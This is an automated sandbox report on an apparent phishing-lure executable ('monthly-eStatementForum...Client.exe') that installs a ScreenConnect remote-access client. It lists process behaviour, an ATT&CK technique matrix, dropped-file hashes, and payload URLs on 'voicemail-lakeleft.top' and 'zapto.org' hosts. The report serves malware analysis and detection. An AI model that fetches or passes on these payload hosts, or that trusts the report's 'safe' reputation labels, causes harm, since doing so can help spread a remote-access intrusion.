                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFAAC463642 CreateNamedPipeW,10_2_00007FFAAC463642
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_00F21806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F21806
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Code function: 9_2_014E4C64 RtlGetVersion,9_2_014E4C64
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match File source: 7.0.ScreenConnect.WindowsClient.exe.e10000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 2628, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7440, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7484, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 35 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 13 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 13 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                  [Behavior graph: ID 1551950; Sample: monthly-eStatementForum1204...; Startdate: 08/11/2024; Architecture: WINDOWS; Score: 51]

                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllPx | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileMa | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support& | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe& | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config. | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exx | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0 | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application.6ZZfsA | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationx | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree | 0% | Avira URL Cloud | safe |
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_ | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  voicemail-lakeleft.top | 194.59.30.201 | true | false | | unknown
                  bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
                  popwee2.zapto.org | 194.59.30.201 | true | false | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
                  time.windows.com | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | high
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe | false | | high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfYsvchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdCsvchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&ScreenConnect.WindowsClient.exe, 00000007.00000002.1570346922.000000001BAF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://Passport.NET/tbAsvchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuresvchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zaptS0AMH0XA.log.1.drfalse
                                                              high
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsCldfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.1295464870.0000019A7F000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.13.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Screedfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
194.59.30.201 | voicemail-lakeleft.top | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false

IP
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1551950
Start date and time:2024-11-08 11:08:18 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of new started processes analysed:19
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:monthly-eStatementForum120478962.Client.exe
Detection:MAL
Classification:mal51.evad.winEXE@19/76@3/2
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 112
• Number of non-executed functions: 26
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 20.101.57.9, 199.232.210.172, 184.28.90.27, 192.229.221.95, 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.72, 40.126.32.138, 40.126.32.134, 20.190.160.14, 40.126.32.74, 20.189.173.21
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7484 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: monthly-eStatementForum120478962.Client.exe
Time | Type | Description
06:44:35 | API Interceptor | 5248414x Sleep call for process: dfsvc.exe modified
Match: 194.59.30.201
Associated Sample Name / URL | Detection | Threat Name
9YOOBuBZtj.exe | malicious | ScreenConnect Tool
6Zx9GI028y.exe | malicious | ScreenConnect Tool
4ZVhm9dOfO.exe | malicious | ScreenConnect Tool
y4FSQMICGJ.exe | malicious | ScreenConnect Tool
9YOOBuBZtj.exe | malicious | ScreenConnect Tool
6Zx9GI028y.exe | malicious | ScreenConnect Tool
y4FSQMICGJ.exe | malicious | ScreenConnect Tool
75kTq6Y4Ck.exe | malicious | ScreenConnect Tool
4ZVhm9dOfO.exe | malicious | ScreenConnect Tool
                                                                                                                                                                                                                                                                support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                  Entropy (8bit):0.35901589905449205
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                                                                                                                                                                                                                                  MD5:7D48941DB05D2D1C9A0C52739933543F
                                                                                                                                                                                                                                                                  SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                                                                                                                                                                                                                                                  SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                                                                                                                                                                                                                                                  SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7107433309639619
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqH:2JIB/wUKUKQncEmYRTwh0r
                                                                                                                                                                                                                                                                  MD5:4339AF983BCC8769F09CE9079CF0866D
                                                                                                                                                                                                                                                                  SHA1:822327E8F060126392F9DDFF4DDBC9B0981CF857
                                                                                                                                                                                                                                                                  SHA-256:F803DD3122A1580AED070952F6ACE8912DF221937446E2E41E0D93644A8290D8
                                                                                                                                                                                                                                                                  SHA-512:72784FE62242ECDDDE13BA8EB76CF612149F4C8B39F362CB200D302A0B07C42EF37DD88094D212C76166145C1931E9456139E881089A1E432AF09747659507A7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcf23b792, page size 16384, Windows version 10.0
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6651686075640577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:FSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:FazaU+uroc2U5Si6
                                                                                                                                                                                                                                                                  MD5:6CCC89EB1ED952D1AB4528289050ABBD
                                                                                                                                                                                                                                                                  SHA1:5F55EB5E6684A9C39541DD2825884AD0F2B1B20B
                                                                                                                                                                                                                                                                  SHA-256:750E40402B4AAD160D85B780FF422C35B876DD71EEC3ED5E0CFC5E361418A029
                                                                                                                                                                                                                                                                  SHA-512:1BA70ECDB373A3D2B2290F80712F8FC5D393915CB88F33F85C2F7D075FDBA823F128829F9B20F6A0F8956A4CD9AAC02D12A5CADA37A2FF8C8A01303A23B5D003
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                  Entropy (8bit):0.07900895785553667
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:4RWsetYeDqU6j/ltLocjmgj/ltNDnj/ltollkqqG9lXlZOS:4RUzDk0KcVr
                                                                                                                                                                                                                                                                  MD5:6D75FC844B4F07C488CC62848F22C2E5
                                                                                                                                                                                                                                                                  SHA1:5A0384CBEE81DF7E4E14D18D09730D7B2A98A215
                                                                                                                                                                                                                                                                  SHA-256:E518D31131BE83719F00361B28510788782B88CB9F9744CE5F82A60A5760A122
                                                                                                                                                                                                                                                                  SHA-512:D3CAB8F1D197CFCF37E153752EF9E22C90B7A2E298A7E60BFB95B5394595C06DE46387B56B3FA253BE6D9459158702FCE1CFFF8DF410F4594F515ED9BB576E1F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                  Entropy (8bit):0.9296103286411475
                                                                                                                                                                                                                                                                  Encrypted:false
